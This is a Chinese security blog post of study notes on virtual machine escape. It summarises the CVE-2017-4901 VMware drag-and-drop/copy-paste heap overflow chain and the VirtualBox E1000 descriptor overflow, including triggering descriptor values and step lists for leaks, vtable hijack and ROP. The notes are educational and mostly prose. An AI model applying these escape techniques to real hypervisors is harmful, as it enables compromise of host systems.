<!DOCTYPE HTML>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">

    

    <title>VM 逃逸入门学习 | </title>
    <meta name="author" content="ssj">
    
    <meta name="description" content="继Linux内核、浏览器、文档型漏洞，虚拟机应该是最后一块了，（从目前我入门二进制漏洞实战来看。主要是针对VM Ware和Virtual Box。
背景知识在此整理任意读写原语的获取技巧读原语找一些有读操作的结构，可以通过漏洞利用覆盖字符串结尾\x00读相邻内容，这种一般不能直接任意地址地址泄露，但">
    
    
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    <meta property="og:title" content="VM 逃逸入门学习">
    <meta property="og:site_name" content="ssj&#39;s blog">

    
    <meta property="og:image" content>
    

    <link rel="icon" type="image/png" href="/favicon.png">
    <link rel="alternate" href="/atom.xml" title="ssj&#39;s blog" type="application/atom+xml">
    <link rel="stylesheet" href="/css/lib/materialize.min.css">
    <link rel="stylesheet" href="/css/lib/font-awesome.min.css">
    <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">

    
        <link rel="stylesheet" href="/css/lib/tranquil-heart.css" type="text/css">
    
    <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
</head>
</html>

<body>
    <img src="/weixin_favicon.png" style="position: absolute; left: -9999px; opacity: 0; filter: alpha(opacity=0);">

    <nav class="pink accent-1">
    <div class="nav-wrapper">
        <a href="#" data-activates="main-menu" class="button-collapse">
            <i class="fa fa-navicon"></i>
        </a>
        <div class="">
            <a href="/" class="brand-logo hide-on-med-and-down">ssj&#39;s blog</a>
            <ul class="right hide-on-med-and-down">
                
                    <li>
                        <a class="menu-home " href="/" >
                            <i class="fa fa-home "></i>
                            
                            Home
                        </a>
                    </li>
                
                    <li>
                        <a class="menu-archive " href="/archives" >
                            <i class="fa fa-archive "></i>
                            
                            Archives
                        </a>
                    </li>
                
                    <li>
                        <a class="menu-category category-menu" href="javascript:;" data-activates="category-menu" >
                            <i class="fa fa-bookmark "></i>
                            
                            Categories
                        </a>
                    </li>
                
                    <li>
                        <a class="menu-reading " href="/reading" >
                            <i class="fa fa-book "></i>
                            
                            Reading
                        </a>
                    </li>
                
                    <li>
                        <a class="menu-about " href="/about" >
                            <i class="fa fa-user "></i>
                            
                            About
                        </a>
                    </li>
                
                    <li>
                        <a class="menu-search modal-trigger " href="#search" >
                            <i class="fa fa-search "></i>
                            
                            Search
                        </a>
                    </li>
                
            </ul>
            <div>
    <ul class="side-nav pink darken-1" id="main-menu">
        
        <li class="side-user">
            <div class="row">
                <div class="col s4 no-padding">
                    <img class="avatar-image circle responsive-img" src="/pingtou.jpg" alt="User Avatar">
                </div>
                <div class="info col s8 valign-wrapper no-padding">
                    <div class="valign">
                        <p class="name">ssj</p>
                        <p class="desc"></p>
                    </div>
                </div>
            </div>
        </li>
        

        
            <li class="no-padding">
                <a class="waves-effect menu-home " href="/" >
                    <i class="fa fa-home "></i>
                    
                    Home
                </a>
            </li>
        
            <li class="no-padding">
                <a class="waves-effect menu-archive " href="/archives" >
                    <i class="fa fa-archive "></i>
                    
                    Archives
                </a>
            </li>
        
            <li class="no-padding">
                <a class="waves-effect menu-category category-menu" href="javascript:;" data-activates="category-menu" >
                    <i class="fa fa-bookmark "></i>
                    
                    Categories
                </a>
            </li>
        
            <li class="no-padding">
                <a class="waves-effect menu-reading " href="/reading" >
                    <i class="fa fa-book "></i>
                    
                    Reading
                </a>
            </li>
        
            <li class="no-padding">
                <a class="waves-effect menu-about " href="/about" >
                    <i class="fa fa-user "></i>
                    
                    About
                </a>
            </li>
        
            <li class="no-padding">
                <a class="waves-effect menu-search modal-trigger " href="#search" >
                    <i class="fa fa-search "></i>
                    
                    Search
                </a>
            </li>
        
    </ul>

    <ul class="side-nav pink darken-1" id="category-menu">
    

            

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/CTF/">
                    CTF <span class="right">8</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/CTF/pwn/">
                    pwn <span class="right">7</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/CTF/Android/">
                    Android <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/Android/">
                    Android <span class="right">14</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/Android/脱壳/">
                    脱壳 <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/Android/马甲包/">
                    马甲包 <span class="right">2</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/面试体验/">
                    面试体验 <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/面试体验/Android/">
                    Android <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/Fuzz/">
                    Fuzz <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/Ethereum/">
                    Ethereum <span class="right">3</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/二进制/">
                    二进制 <span class="right">11</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/二进制/v8/">
                    v8 <span class="right">6</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/二进制/Base/">
                    Base <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/二进制/Kernel/">
                    Kernel <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/二进制/vm/">
                    vm <span class="right">2</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/二进制/Docs/">
                    Docs <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/CVE/">
                    CVE <span class="right">11</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/杂/">
                    杂 <span class="right">5</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/杂/定场诗/">
                    定场诗 <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/杂/听戏/">
                    听戏 <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/杂/京剧/">
                    京剧 <span class="right">3</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/基础知识/">
                    基础知识 <span class="right">2</span></a>
                </a>
            </li>

        

            <li class="collapse-level-1" collapse-level="1">
                <a class="no-padding" href="/categories/基础知识/Cpp/">
                    Cpp <span class="right">1</span></a>
                </a>
            </li>

        

            <li class="collapse-level-0" collapse-level="0">
                <a class="no-padding" href="/categories/算法/">
                    算法 <span class="right">1</span></a>
                </a>
            </li>

        

    </ul>
</div>

        </div>
    </div>
</nav>

<div id="search" class="modal search-modal">
    <div class="row">
        <div class="input-field col s12">
              <input id="search-input" type="text">
              <label for="search-input">Search</label>
        </div>

    </div>
    <div id="search-result" class="search-result col s12">

    </div>
</div>


    <main>
        <div class="container main-container">
    <nav class="page-nav hide-on-small-only">
    <div class="nav-wrapper pink">
        <span class="breadcrumb">Current page(Categories)</span>
        
            
    
    
    <a class="breadcrumb" href="/categories/二进制/">二进制</a><a class="breadcrumb" href="/categories/二进制/vm/">vm</a>


        

        
    </div>
</nav>

<article>
    <div class="card">
        <div class="card-content">
            

            <div class="article-title">
                
    
        <h1>VM 逃逸入门学习</h1>
    


            </div>
            <time class="pink-link-context" datetime="2020-05-09T11:08:53.000Z"><a href="/2020/05/09/vm逃逸入门/">2020-05-09</a></time>

            <span id="busuanzi_container_page_pv" class="read-times-container">
    <i class="fa fa-eye"></i>
    <span id="busuanzi_value_page_pv"></span>
</span>

            
    <div class="tags-row">
        
            <a href="/tags/二进制/" class="chip pink lighten-1">二进制</a>
        
            <a href="/tags/vm/" class="chip pink lighten-1">vm</a>
        
    </div>


            <div class="toc pink-link-context hide-on-med-and-down">
    <ol class="section table-of-contents"><li class="section table-of-contents-item section table-of-contents-level-2"><a class="section table-of-contents-link" href="#背景知识"><span class="section table-of-contents-text">背景知识</span></a><ol class="section table-of-contents-child"><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#在此整理任意读写原语的获取技巧"><span class="section table-of-contents-text">在此整理任意读写原语的获取技巧</span></a><ol class="section table-of-contents-child"><li class="section table-of-contents-item section table-of-contents-level-4"><a class="section table-of-contents-link" href="#读原语"><span class="section table-of-contents-text">读原语</span></a></li><li class="section table-of-contents-item section table-of-contents-level-4"><a class="section table-of-contents-link" href="#写原语"><span class="section table-of-contents-text">写原语</span></a></li><li class="section table-of-contents-item section table-of-contents-level-4"><a class="section table-of-contents-link" href="#执行shellcode"><span class="section table-of-contents-text">执行shellcode</span></a></li></ol></li></ol></li><li class="section table-of-contents-item section table-of-contents-level-2"><a class="section table-of-contents-link" href="#CVE-2017-4901-利用一个堆溢出漏洞实现-VMware-虚拟机逃逸"><span class="section table-of-contents-text">CVE-2017-4901 利用一个堆溢出漏洞实现 VMware 虚拟机逃逸</span></a><ol class="section table-of-contents-child"><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#VMware-RPCI-机制"><span class="section table-of-contents-text">VMware RPCI 机制</span></a></li><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#漏洞点-拖放-DnD-与复制粘贴-CP"><span class="section table-of-contents-text">漏洞点 拖放(DnD)与复制粘贴(CP)</span></a></li><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#利用"><span class="section table-of-contents-text">利用</span></a><ol class="section table-of-contents-child"><li class="section table-of-contents-item section table-of-contents-level-4"><a class="section table-of-contents-link" href="#绕过ASLR"><span class="section table-of-contents-text">绕过ASLR</span></a></li><li class="section table-of-contents-item section table-of-contents-level-4"><a class="section table-of-contents-link" href="#覆盖-CopyPaste"><span class="section table-of-contents-text">覆盖 CopyPaste</span></a></li><li class="section table-of-contents-item section table-of-contents-level-4"><a class="section table-of-contents-link" href="#覆盖-DnD"><span class="section table-of-contents-text">覆盖 DnD</span></a></li></ol></li><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#总结"><span class="section table-of-contents-text">总结</span></a></li></ol></li><li class="section table-of-contents-item section table-of-contents-level-2"><a class="section table-of-contents-link" href="#VirtualBox-E1000-0day-虚拟机逃逸漏洞"><span class="section table-of-contents-text">VirtualBox E1000 0day 虚拟机逃逸漏洞</span></a><ol class="section table-of-contents-child"><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#漏洞简介"><span class="section table-of-contents-text">漏洞简介</span></a></li><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#漏洞点"><span class="section table-of-contents-text">漏洞点</span></a></li><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#漏洞利用"><span class="section table-of-contents-text">漏洞利用</span></a></li></ol></li><li class="section table-of-contents-item section table-of-contents-level-2"><a class="section table-of-contents-link" href="#48小时逃逸Virtualbox虚拟机——记一次CTF中的0day之旅"><span class="section table-of-contents-text">48小时逃逸Virtualbox虚拟机——记一次CTF中的0day之旅</span></a><ol class="section table-of-contents-child"><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#漏洞点简介"><span class="section table-of-contents-text">漏洞点简介</span></a></li><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#利用-1"><span class="section table-of-contents-text">利用</span></a><ol class="section table-of-contents-child"><li class="section table-of-contents-item section table-of-contents-level-4"><a class="section table-of-contents-link" href="#信息泄露"><span class="section table-of-contents-text">信息泄露</span></a></li><li class="section table-of-contents-item section table-of-contents-level-4"><a class="section table-of-contents-link" href="#任意地址写"><span class="section table-of-contents-text">任意地址写</span></a></li><li class="section table-of-contents-item section table-of-contents-level-4"><a class="section table-of-contents-link" href="#整体利用"><span class="section table-of-contents-text">整体利用</span></a></li><li class="section table-of-contents-item section table-of-contents-level-4"><a class="section table-of-contents-link" href="#完整exp"><span class="section table-of-contents-text">完整exp</span></a></li></ol></li><li class="section table-of-contents-item section table-of-contents-level-3"><a class="section table-of-contents-link" href="#进一步思考"><span class="section table-of-contents-text">进一步思考</span></a></li></ol></li></ol>
</div>


            <div class="entry pink-link-context">
                <p>继Linux内核、浏览器、文档型漏洞，虚拟机应该是最后一块了，（从目前我入门二进制漏洞实战来看。主要是针对VM Ware和Virtual Box。</p>
<h2 id="背景知识"><a href="#背景知识" class="headerlink" title="背景知识"></a>背景知识</h2><h3 id="在此整理任意读写原语的获取技巧"><a href="#在此整理任意读写原语的获取技巧" class="headerlink" title="在此整理任意读写原语的获取技巧"></a>在此整理任意读写原语的获取技巧</h3><h4 id="读原语"><a href="#读原语" class="headerlink" title="读原语"></a>读原语</h4><p>找一些有读操作的结构，可以通过漏洞利用覆盖字符串结尾\x00读相邻内容，这种一般不能直接任意地址地址泄露，但是可以通过布局内存，泄露出想要的地址。</p>
<p>任意地址读基本就是修改数组的长度了。</p>
<p>类型混淆也可以达到读效果，比如把指针当做字符串解析，可以泄露这个指针。</p>
<h4 id="写原语"><a href="#写原语" class="headerlink" title="写原语"></a>写原语</h4><p>任意地址写可以先用漏洞点修改某个对象的长度，然后用这个对象去覆盖相邻有写操作的对象，达到任意地址写。</p>
<h4 id="执行shellcode"><a href="#执行shellcode" class="headerlink" title="执行shellcode"></a>执行shellcode</h4><p>shellcode起码要放在rwx的内存页中，要么就是gadgets。</p>
<p>执行的话，可以任意地址写去修改函数指针、虚表；也可以类型混淆，比如把字符串解析成指针，就可以执行了（注意dep）。</p>
<h2 id="CVE-2017-4901-利用一个堆溢出漏洞实现-VMware-虚拟机逃逸"><a href="#CVE-2017-4901-利用一个堆溢出漏洞实现-VMware-虚拟机逃逸" class="headerlink" title="CVE-2017-4901 利用一个堆溢出漏洞实现 VMware 虚拟机逃逸"></a>CVE-2017-4901 利用一个堆溢出漏洞实现 VMware 虚拟机逃逸</h2><p><a href="https://paper.seebug.org/348/" target="_blank" rel="noopener">https://paper.seebug.org/348/</a></p>
<h3 id="VMware-RPCI-机制"><a href="#VMware-RPCI-机制" class="headerlink" title="VMware RPCI 机制"></a>VMware RPCI 机制</h3><p>用这个与host实现通信看下代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span>  </span><br><span class="line">Backdoor_InOut(Backdoor_proto *myBp) <span class="comment">// IN/OUT  </span></span><br><span class="line">&#123;</span><br><span class="line">   uint64 dummy;</span><br><span class="line"></span><br><span class="line">   __asm__ __volatile__(</span><br><span class="line">#ifdef __APPLE__</span><br><span class="line">        <span class="comment">/*</span></span><br><span class="line"><span class="comment">         * Save %rbx on the stack because the Mac OS GCC doesn't want us to</span></span><br><span class="line"><span class="comment">         * clobber it - it erroneously thinks %rbx is the PIC register.</span></span><br><span class="line"><span class="comment">         * (Radar bug 7304232)</span></span><br><span class="line"><span class="comment">         */</span></span><br><span class="line">        <span class="string">"pushq %%rbx"</span>           <span class="string">"\n\t"</span></span><br><span class="line">#endif</span><br><span class="line">        <span class="string">"pushq %%rax"</span>           <span class="string">"\n\t"</span></span><br><span class="line">        <span class="string">"movq 40(%%rax), %%rdi"</span> <span class="string">"\n\t"</span></span><br><span class="line">        <span class="string">"movq 32(%%rax), %%rsi"</span> <span class="string">"\n\t"</span></span><br><span class="line">        <span class="string">"movq 24(%%rax), %%rdx"</span> <span class="string">"\n\t"</span></span><br><span class="line">        <span class="string">"movq 16(%%rax), %%rcx"</span> <span class="string">"\n\t"</span></span><br><span class="line">        <span class="string">"movq  8(%%rax), %%rbx"</span> <span class="string">"\n\t"</span></span><br><span class="line">        <span class="string">"movq   (%%rax), %%rax"</span> <span class="string">"\n\t"</span></span><br><span class="line">        <span class="string">"inl %%dx, %%eax"</span>       <span class="string">"\n\t"</span>  <span class="comment">/* NB: There is no inq instruction */</span></span><br><span class="line">        <span class="string">"xchgq %%rax, (%%rsp)"</span>  <span class="string">"\n\t"</span></span><br><span class="line">        <span class="string">"movq %%rdi, 40(%%rax)"</span> <span class="string">"\n\t"</span></span><br><span class="line">        <span class="string">"movq %%rsi, 32(%%rax)"</span> <span class="string">"\n\t"</span></span><br><span class="line">        <span class="string">"movq %%rdx, 24(%%rax)"</span> <span class="string">"\n\t"</span></span><br><span class="line">        <span class="string">"movq %%rcx, 16(%%rax)"</span> <span class="string">"\n\t"</span></span><br><span class="line">        <span class="string">"movq %%rbx,  8(%%rax)"</span> <span class="string">"\n\t"</span></span><br><span class="line">        <span class="string">"popq          (%%rax)"</span> <span class="string">"\n\t"</span></span><br><span class="line">#ifdef __APPLE__</span><br><span class="line">        <span class="string">"popq %%rbx"</span>            <span class="string">"\n\t"</span></span><br><span class="line">#endif</span><br><span class="line">      : <span class="string">"=a"</span> (dummy)</span><br><span class="line">      : <span class="string">"0"</span> (myBp)</span><br><span class="line">      <span class="comment">/*</span></span><br><span class="line"><span class="comment">       * vmware can modify the whole VM state without the compiler knowing</span></span><br><span class="line"><span class="comment">       * it. So far it does not modify EFLAGS. --hpreg</span></span><br><span class="line"><span class="comment">       */</span></span><br><span class="line">      :</span><br><span class="line">#ifndef __APPLE__</span><br><span class="line">      <span class="comment">/* %rbx is unchanged at the end of the function on Mac OS. */</span></span><br><span class="line">      <span class="string">"rbx"</span>,</span><br><span class="line">#endif</span><br><span class="line">      <span class="string">"rcx"</span>, <span class="string">"rdx"</span>, <span class="string">"rsi"</span>, <span class="string">"rdi"</span>, <span class="string">"memory"</span></span><br><span class="line">   );</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>注意<code>inl</code>这个指令，guest是不允许io操作的，它发起io操作，host会产生异常，异常会被捕捉，从而实现通信。</p>
<h3 id="漏洞点-拖放-DnD-与复制粘贴-CP"><a href="#漏洞点-拖放-DnD-与复制粘贴-CP" class="headerlink" title="漏洞点 拖放(DnD)与复制粘贴(CP)"></a>漏洞点 拖放(DnD)与复制粘贴(CP)</h3><p>对于Version 4的DnD/CP功能，它检查是否越界的时候，只对第一个包有效，后续的包可能越界产生堆溢出。Version 3也是一样的。</p>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p>要注意的是，因为有这个溢出，我们已经可以任意地址写了，所以要做的是进行信息泄露，找到要攻击对象的位置，然后决定怎么覆盖个啥。</p>
<h4 id="绕过ASLR"><a href="#绕过ASLR" class="headerlink" title="绕过ASLR"></a>绕过ASLR</h4><p>需要找一guest可以写并且取回的操作，找到了如下：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">info-set guestinfo.KEY VALUE</span><br><span class="line">info-get guestinfo.KEY</span><br></pre></td></tr></table></figure>
<p>我们可以通过溢出来覆盖结尾的null字节，让字符串连接上相邻的内存块。如果我们能够在发生溢出的内存块和DnD或CP对象之间分配一个字符串，那么我们就能泄露对象的vtable地址，从而我们就可以知道vmware-vmx的地址。</p>
<p>分配一堆字符串，利用溢出改字符，找出被改那个字符串，这样就找到了一个字符串可以被用来读取泄露的数据，然后以0xA8的粒度继续溢出，不断地读，由于DnD和CP对象的vtable距离vmware-vmx基地址的偏移是固定的，只需要检查最低一些数据位，就能够判断溢出是否到达了目标对象。</p>
<p>此时我们有了目标对象位置。</p>
<h4 id="覆盖-CopyPaste"><a href="#覆盖-CopyPaste" class="headerlink" title="覆盖 CopyPaste"></a>覆盖 CopyPaste</h4><p>这是要覆盖虚表指针为指向shellcode的恶意函数指针。</p>
<p>对于 CopyPaste 对象，我们可以覆盖虚表指针，让它指向我们可控的其他数据。我们需要找到一个指针，指针指向的数据是可控并被用做对象的虚表。为此我们使用了另一个 RPCI 命令 unity.window.contents.start。这个命令主要用于 Unity 模式下，在 host 上绘制一些图像。这个操作可以让我们往相对 vmware-vmx 偏移已知的位置写入一些数据。该命令接收的参数是图像的宽度和高度，二者都是32位，合并起来我们就在已知位置获得了一个64位的数据。我们用它来作为虚表中的一个指针，通过发送一个 CopyPast 命令即可触发该虚函数调用，步骤如下：</p>
<ul>
<li>发送 unity.window.contents.start 命令，通过指定参数宽度和高度，往全局变量处写入一个64位的栈迁移 gadget 地址</li>
<li>覆盖对象虚表指针，指向伪造的虚表（调整虚表地址偏移）</li>
<li>发送 CopyPaste 命令，触发虚函数调用</li>
<li>ROP</li>
</ul>
<h4 id="覆盖-DnD"><a href="#覆盖-DnD" class="headerlink" title="覆盖 DnD"></a>覆盖 DnD</h4><p>先康一眼结构：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">DnD_CopyPaste_RpcV3&#123;  </span><br><span class="line">    <span class="keyword">void</span> * vtable;</span><br><span class="line">    ...</span><br><span class="line">    <span class="keyword">uint64_t</span> ifacetype;</span><br><span class="line">    RpcUtil&#123;</span><br><span class="line">        <span class="keyword">void</span> * vtable;</span><br><span class="line">        RpcBase * mRpc;</span><br><span class="line">        DnDTransportBuffer&#123;</span><br><span class="line">            <span class="keyword">uint64_t</span> seqNum;</span><br><span class="line">            <span class="keyword">uint8_t</span> * buffer;</span><br><span class="line">            <span class="keyword">uint64_t</span> totalSize;</span><br><span class="line">            <span class="keyword">uint64_t</span> offset;</span><br><span class="line">            ...</span><br><span class="line">        &#125;</span><br><span class="line">        ...</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">RpcBase&#123;  </span><br><span class="line">    <span class="keyword">void</span> * vtable;</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>对于 DnD 对象，我们不能只覆盖 vtable 指针，因为在发生溢出之后 vtable 会立马被访问，另一个虚函数会被调用，而目前我们只能通过 unity 图像的宽度和高度控制一个 qword，所以无法控制更大的虚表。</p>
<p>对象中有个指针指向另一个C++对象 RpcBase，如果我们能用一个可控数据的指针的指针覆盖 mRpc 这个域，那我们就控制了 RpcBase 的 vtable。对此我们可以继续使用 unity.window.contents.start 命令来来控制 mRpc，该命令的另一个参数是 imgsize，这个参数代表分配的图像 buffer 的大小。这个 buffer 分配出来后，它的地址会存在 vmware-vmx 的固定偏移处。我们可以使用命令 unity.window.contents.chunk 来填充 buffer 的内容。步骤如下：</p>
<ul>
<li>发送unity.window.contents.start命令来分配一个buffer，后续我们用它来存储一个伪造的vtable。</li>
<li>发送unity.window.contents.chunk命令来填充伪造的vtable，其中填入一个栈迁移的gadget</li>
<li>通过溢出覆盖DnD对象的mRpc域，让它指向存储buffer地址的地方（某全局变量处），即写入一个指针的指针</li>
<li>通过发送DnD命令来触发mRpc域的虚函数调用</li>
<li>ROP</li>
</ul>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>这种几乎能任意长度溢出的漏洞利用起来基本是<code>信息泄露，泄露目标对象位置</code>-&gt;<code>修改操作vtable</code>-&gt;<code>ROP</code>。</p>
<h2 id="VirtualBox-E1000-0day-虚拟机逃逸漏洞"><a href="#VirtualBox-E1000-0day-虚拟机逃逸漏洞" class="headerlink" title="VirtualBox E1000 0day 虚拟机逃逸漏洞"></a>VirtualBox E1000 0day 虚拟机逃逸漏洞</h2><p><a href="https://www.anquanke.com/post/id/163714" target="_blank" rel="noopener">https://www.anquanke.com/post/id/163714</a></p>
<h3 id="漏洞简介"><a href="#漏洞简介" class="headerlink" title="漏洞简介"></a>漏洞简介</h3><p>VirtualBox默认虚拟网络设备为上文的82540EM（NAT模式），以下简称E1000。</p>
<p>E1000存在漏洞，允许guest虚拟机中拥有管理员权限的攻击者转移到主机ring3中，并利用其它方式（/dev/vboxdrv）提权至ring0。</p>
<h3 id="漏洞点"><a href="#漏洞点" class="headerlink" title="漏洞点"></a>漏洞点</h3><p>网卡驱动逻辑漏洞，因为处理Tx描述符校验有一些问题，可能只校验了三个却循环执行了五个。</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">context_1.header_length = 0</span><br><span class="line">context_1.maximum_segment_size = 0x3010</span><br><span class="line">context_1.tcp_segmentation_enabled = <span class="literal">true</span></span><br><span class="line"></span><br><span class="line">data_2.data_length = 0x10</span><br><span class="line">data_2.end_of_packet = <span class="literal">false</span></span><br><span class="line">data_2.tcp_segmentation_enabled = <span class="literal">true</span></span><br><span class="line"></span><br><span class="line">data_3.data_length = 0</span><br><span class="line">data_3.end_of_packet = <span class="literal">true</span></span><br><span class="line">data_3.tcp_segmentation_enabled = <span class="literal">true</span></span><br><span class="line"></span><br><span class="line">context_4.header_length = 0</span><br><span class="line">context_4.maximum_segment_size = 0xF</span><br><span class="line"></span><br><span class="line">context_4.tcp_segmentation_enabled = <span class="literal">true</span></span><br><span class="line">data_5.data_length = 0x4188</span><br><span class="line">data_5.end_of_packet = <span class="literal">true</span></span><br><span class="line">data_5.tcp_segmentation_enabled = <span class="literal">true</span></span><br></pre></td></tr></table></figure>
<p>可以绕过校验非法改长度，达到堆溢出。具体代码不粘了。</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><ul>
<li>攻击者先卸载Linux guest虚拟机中默认加载的e1000.ko并加载漏洞利用的LKM。</li>
<li>LKM根据数据表初始化E1000，仅初始化发送部分即可。</li>
<li>LKM禁用E1000环回模式<ol>
<li>LKM禁用E1000环回模式，使得堆栈缓冲区溢出代码不可达。</li>
<li>LKM利用漏洞造成堆缓冲区溢出。</li>
<li>堆缓冲区溢出可用E1000 EEPROM在128KB范围内写入任意两个字节，攻击者获得写原语。</li>
<li>LKM利用写原语8次，将数据写入堆中ACPI（高级配置和电源接口）数据结构。写入堆缓冲区索引变量后从中读取单字节，因为缓冲区大小小于最大索引号255，攻击者可读缓冲区，获得读原语。</li>
<li>LKM使用读原语8次访问ACPI并从堆中读8字节数据（VBoxDD.so共享库指针）</li>
<li>LKM将指针减去RVA即可拿到VBoxDD.so库。</li>
</ol>
</li>
<li>LKM启用E1000环回模式<ol>
<li>LKM启用E1000环回模式，使得堆栈缓冲区溢出代码可达。</li>
<li>LKM利用漏洞造成栈溢出，返回地址（RIP/EIP）被覆盖，攻击者获得控制权。</li>
<li>利用ROP链执行shellcode。</li>
</ol>
</li>
<li>执行shellcode<ol>
<li>shellcode加载器从栈处载入shellcode执行。</li>
<li>shellcode利用fork和execve系统调用执行进程。</li>
</ol>
</li>
<li>攻击者卸载LKM并加载e1000.ko并恢复网络。</li>
</ul>
